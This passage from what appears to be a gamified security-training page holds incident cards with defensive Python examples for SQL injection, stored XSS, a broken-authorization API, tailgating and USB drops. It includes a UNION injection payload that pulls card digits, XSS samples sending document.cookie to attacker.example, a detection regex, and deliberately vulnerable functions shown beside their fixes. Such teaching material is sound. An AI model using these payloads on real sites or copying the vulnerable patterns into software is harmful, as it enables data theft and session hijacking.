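    conn.executescript("""
        CREATE TABLE tickets (id INTEGER PRIMARY KEY, email TEXT, subject TEXT);
        CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT);
        INSERT INTO tickets VALUES (1, 'alice@example.com', 'Login issue');
        INSERT INTO customers VALUES (1, 'alice@example.com', '4242'), (2, 'bob@example.com', '1881');
    """)
    return conn


def my_tickets_vulnerable(conn, email):
    """The bug: the form value is pasted into the SQL text, so a quote in the
    input ends the literal and the rest of the input is parsed as SQL."""
    sql = f"SELECT id, subject FROM tickets WHERE email = '{email}'"
    return conn.execute(sql).fetchall()


def my_tickets_safe(conn, email):
    """The fix: the value travels as a bound parameter and is never parsed
    as SQL, whatever characters it contains."""
    return conn.execute("SELECT id, subject FROM tickets WHERE email = ?", (email,)).fetchall()


# A UNION payload of the kind sqlmap arrives at: two columns to match the
# original SELECT, a trailing comment to swallow the closing quote.
UNION_PAYLOAD = "x' UNION SELECT email, card_last4 FROM customers --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", my_tickets_vulnerable(db, UNION_PAYLOAD))
    print("safe:      ", my_tickets_safe(db, UNION_PAYLOAD))
```

The UNION only works because the web application's database account can read `customers` at all; after rotating that account's password, also strip it down to the tables the form actually needs, so the next injection has nothing worth reading.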
MEDIUM ID: xss-stored

PERSISTENT SCRIPT

WEB / XSS

>> SITUATION : Theft of admin session cookies via a script stored in a blog comment.

POTENTIAL IMPACT

CMS takeover, site defacement.

TACTICAL OBJECTIVES

  • [-] Clean DB
  • [-] CSP (Content Security Policy)
  • [-] HttpOnly Cookies
  • [-] Output encoding / HTML sanitization

REQUIRED ARSENAL

Burp Suite CSP Evaluator HTML Purifier Scanner
MISSION STATUS: CODE CLEANED
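Worked example for the four PERSISTENT SCRIPT objectives, added here and not part of the original card: a taint scan over constructed comment rows (clean the DB), verbatim versus encoded rendering, the session cookie with HttpOnly/Secure/SameSite, and a nonce-based CSP. Comment bodies and the attacker domain are invented.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed comments as they would sit in the CMS comment table.
COMMENTS_SAMPLE = [
    (1, "Great article, thanks!"),
    (2, '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>Nice post!'),
    (3, '<img src=x onerror="location=\'https://attacker.example/?c=\'+document.cookie">'),
    (4, "Use <b>bold</b> sparingly"),
]

# Heuristic: script tags, inline event handlers, javascript: URLs.
TAINT = re.compile(r"<\s*script\b|\bon\w+\s*=|javascript:", re.I)


def tainted_comment_ids(rows):
    """Step 1, clean the DB: rows carrying script or event-handler payloads."""
    return [cid for cid, body in rows if TAINT.search(body)]


def render_comment_vulnerable(body):
    """The original bug: stored text is placed into the page verbatim."""
    return f'<li class="comment">{body}</li>'


def render_comment_safe(body):
    """Output encoding: '<', '>', '&' and both quotes become entities, so the
    browser shows the payload as text instead of executing it."""
    return f'<li class="comment">{html.escape(body, quote=True)}</li>'


def session_cookie_header(session_id):
    """HttpOnly keeps document.cookie from reading the session; Secure and
    SameSite limit where it travels."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    c["session"]["path"] = "/"
    return c.output(header="").strip()


def csp_header(nonce):
    """Even if a payload slips through, inline script without this nonce will
    not run. The nonce must be random and fresh for every response."""
    return (f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'self'; frame-ancestors 'none'")


def hardened_response(rows, session_id, nonce):
    """Headers and body for the comments page with all three defences applied."""
    body = "<ul>" + "".join(render_comment_safe(b) for _, b in rows) + "</ul>"
    headers = {"Content-Security-Policy": csp_header(nonce),
               "Set-Cookie": session_cookie_header(session_id)}
    return headers, body


if __name__ == "__main__":
    print("tainted rows:", tainted_comment_ids(COMMENTS_SAMPLE))
    print(render_comment_vulnerable(COMMENTS_SAMPLE[1][1]))
    print(render_comment_safe(COMMENTS_SAMPLE[1][1]))
    headers, _ = hardened_response(COMMENTS_SAMPLE, "s3ss10n", "r4nd0m")
    print(headers)
```

HttpOnly stops the cookie from being read by script, not the script from running: an injected payload can still act as the admin inside the page (CSRF-style requests with the cookie attached automatically), which is why output encoding and CSP remain the primary fixes and the cookie flag is the backstop. The taint regex is a triage aid for the clean-up, not a sanitizer; a real allow-list sanitizer (the HTML Purifier listed in the arsenal) decides what markup comments may keep.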
HIGH ID: api-breach

API BACKDOOR

API SECURITY

>> SITUATION : A forgotten test API exposes production data: it requires no authentication and never checks that the requested object belongs to the caller (BOLA).

POTENTIAL IMPACT

Massive data exposure, security control bypass.

TACTICAL OBJECTIVES

  • [-] Close endpoint
  • [-] API Inventory (Zombie APIs)
  • [-] Implement authentication (OAuth2) and per-object authorization checks
  • [-] Rate Limiting

REQUIRED ARSENAL

Postman OWASP ZAP API Gateway Swagger
MISSION STATUS: API SECURED
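Worked example for API BACKDOOR, added here and not the page's material. It shows the test endpoint's two defects beside the fixed handler (authentication required, object ownership checked, identical response for "missing" and "not yours" so IDs cannot be enumerated), plus a small zombie-API check that diffs routes seen in an access log against the OpenAPI spec. Invoice data, routes and log lines are constructed.

```python
import re

# Constructed production records keyed by invoice ID.
INVOICES = {
    101: {"owner": "alice", "total": 120.0},
    102: {"owner": "bob", "total": 99.5},
}


class Unauthorized(Exception):
    pass


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(invoice_id, caller=None):
    """The forgotten test endpoint: no caller check at all. Anyone who can
    guess an ID (they are sequential) reads anyone's invoice."""
    return INVOICES[invoice_id]


def get_invoice_safe(invoice_id, caller):
    """Authentication first, then authorization against the object itself."""
    if caller is None:
        raise Unauthorized()
    invoice = INVOICES.get(invoice_id)
    # Same answer for "does not exist" and "not yours": a distinct 404 would
    # tell the attacker which IDs are worth retrying with another account.
    if invoice is None or invoice["owner"] != caller:
        raise Forbidden()
    return invoice


def access_outcome(invoice_id, caller):
    """HTTP status the safe handler would answer with."""
    try:
        get_invoice_safe(invoice_id, caller)
        return 200
    except Unauthorized:
        return 401
    except Forbidden:
        return 403


# Zombie-API check: routes actually being served versus routes in the spec.
OPENAPI_PATHS = {"/v2/invoices/{id}", "/v2/customers/{id}"}   # assumption: the documented API

# Constructed gateway access log in combined format.
ACCESS_LOG_SAMPLE = """\
203.0.113.9 - - [01/May/2024:10:02:11 +0000] "GET /v2/invoices/101 HTTP/1.1" 200 412
203.0.113.9 - - [01/May/2024:10:02:13 +0000] "GET /v1-test/invoices/102 HTTP/1.1" 200 398
203.0.113.9 - - [01/May/2024:10:02:14 +0000] "GET /v1-test/invoices/103 HTTP/1.1" 200 401
10.0.3.4 - - [01/May/2024:10:05:00 +0000] "GET /v2/customers/7 HTTP/1.1" 200 1203
"""

REQUEST_LINE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE) (\S+) HTTP/')


def normalize_route(path):
    """Collapse numeric path segments so /v2/invoices/101 matches /v2/invoices/{id}."""
    return re.sub(r"/\d+(?=/|$)", "/{id}", path.split("?", 1)[0])


def undocumented_routes(spec_paths, access_log):
    """Routes answered by the gateway that no spec claims: the zombie APIs."""
    seen = set()
    for line in access_log.splitlines():
        m = REQUEST_LINE.search(line)
        if m:
            seen.add(normalize_route(m.group(1)))
    return sorted(seen - set(spec_paths))


if __name__ == "__main__":
    print("vulnerable:", get_invoice_vulnerable(102))
    for args in ((102, "alice"), (102, None), (101, "alice")):
        print("safe", args, "->", access_outcome(*args))
    print("undocumented:", undocumented_routes(OPENAPI_PATHS, ACCESS_LOG_SAMPLE))
```

Closing the endpoint is the first move; the ownership check is what keeps the same bug out of the documented `/v2` routes, and the log diff is how you find the next forgotten path before someone else does. Rate limiting at the gateway slows ID enumeration but does not fix BOLA on its own: a few hundred requests an hour still walk a sequential ID space over a weekend.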
LOW ID: tailgating

THE SHADOW

PHYSICAL SEC

>> SITUATION : An intruder follows an employee to enter the secure zone without a badge.

POTENTIAL IMPACT

Physical access to servers, hardware theft, keylogger installation.

TACTICAL OBJECTIVES

  • [-] CCTV review
  • [-] Hardware inventory
  • [-] Employee awareness
  • [-] Access control

REQUIRED ARSENAL

CCTV Access Logs Security Guards Training
MISSION STATUS: INTRUDER EVICTED
MEDIUM ID: usb-drop

LOST DRIVE

PHYSICAL / MALWARE

>> SITUATION : Infected USB drives are dropped in the parking lot. An employee plugs one in.

POTENTIAL IMPACT

Internal network infection, bridge to the outside.

TACTICAL OBJECTIVES

  • [-] Block USB storage (GPO removable-storage policy)
  • [-] Scan workstation
  • [-] Prevention campaign
  • [-] EDR blocking

REQUIRED ARSENAL

GPO EDR Antivirus Awareness
MISSION STATUS: THREAT CONTAINED